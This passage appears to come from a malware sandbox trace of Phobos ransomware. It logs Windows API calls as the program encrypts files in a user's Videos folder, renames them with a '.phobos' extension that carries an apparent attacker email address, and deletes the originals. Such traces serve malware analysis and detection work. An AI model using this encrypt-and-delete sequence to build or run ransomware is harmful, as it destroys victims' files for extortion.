lpOverlapped=0x0) returned 1 [0199.874] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.874] CloseHandle (hObject=0x160) returned 1 [0199.874] CloseHandle (hObject=0xac) returned 1 [0199.874] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nX2QY4T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nx2qy4t.avi")) returned 1 [0199.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.877] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=54186) returned 1 [0199.877] CloseHandle (hObject=0xac) returned 1 [0199.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv")) returned 0x20 [0199.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.877] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.877] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.878] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.878] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.878] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd3aa, lpOverlapped=0x0) returned 1 [0199.879] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd3b0, dwBufLen=0xd3b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd3b0) returned 1 [0199.880] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd3b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd3b0, lpOverlapped=0x0) returned 1 [0199.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0199.881] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.881] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.881] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.881] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.881] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.881] CloseHandle (hObject=0xac) returned 1 [0199.881] CloseHandle (hObject=0x160) returned 1 [0199.882] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oyrwfs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oyrwfs.mkv")) returned 1 [0199.883] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.883] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=48044) returned 1 [0199.883] CloseHandle (hObject=0x160) returned 1 [0199.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4")) returned 0x20 [0199.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.885] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.885] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbbac, lpOverlapped=0x0) returned 1 [0199.887] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbb0, dwBufLen=0xbbb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbb0) returned 1 [0199.887] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbbb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbbb0, lpOverlapped=0x0) returned 1 [0199.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0199.889] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.889] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.889] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.889] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.889] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.889] CloseHandle (hObject=0x160) returned 1 [0199.889] CloseHandle (hObject=0xac) returned 1 [0199.889] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tPkZ5WJTmJ0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tpkz5wjtmj0.mp4")) returned 1 [0199.890] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.891] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=48220) returned 1 [0199.891] CloseHandle (hObject=0xac) returned 1 [0199.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi")) returned 0x20 [0199.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.892] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.892] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.894] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.894] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbc5c, lpOverlapped=0x0) returned 1 [0199.896] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbc60, dwBufLen=0xbc60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbc60) returned 1 [0199.897] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbc60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbc60, lpOverlapped=0x0) returned 1 [0199.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0199.898] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.899] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0199.899] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.899] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0199.899] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.899] CloseHandle (hObject=0xac) returned 1 [0199.899] CloseHandle (hObject=0x160) returned 1 [0199.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U-DLsKGLUsXu1n0v49.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u-dlskglusxu1n0v49.avi")) returned 1 [0199.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.901] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=46980) returned 1 [0199.901] CloseHandle (hObject=0x160) returned 1 [0199.901] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi")) returned 0x20 [0199.901] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.902] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.902] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.902] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0199.903] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.903] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb784, lpOverlapped=0x0) returned 1 [0200.038] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb790, dwBufLen=0xb790 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb790) returned 1 [0200.038] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb790, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb790, lpOverlapped=0x0) returned 1 [0200.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0200.040] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.040] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0200.040] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.040] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0200.040] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.040] CloseHandle (hObject=0x160) returned 1 [0200.040] CloseHandle (hObject=0xac) returned 1 [0200.218] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U6BoOd0q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u6bood0q.avi")) returned 1 [0200.220] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.220] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.220] CloseHandle (hObject=0x160) returned 1 [0200.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp")) returned 0x20 [0200.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.221] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.221] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.221] CloseHandle (hObject=0x160) returned 1 [0200.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp")) returned 0x20 [0200.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.222] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.222] CloseHandle (hObject=0x160) returned 1 [0200.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp")) returned 0x20 [0200.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.223] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.223] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.223] CloseHandle (hObject=0x160) returned 1 [0200.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp")) returned 0x20 [0200.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.224] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 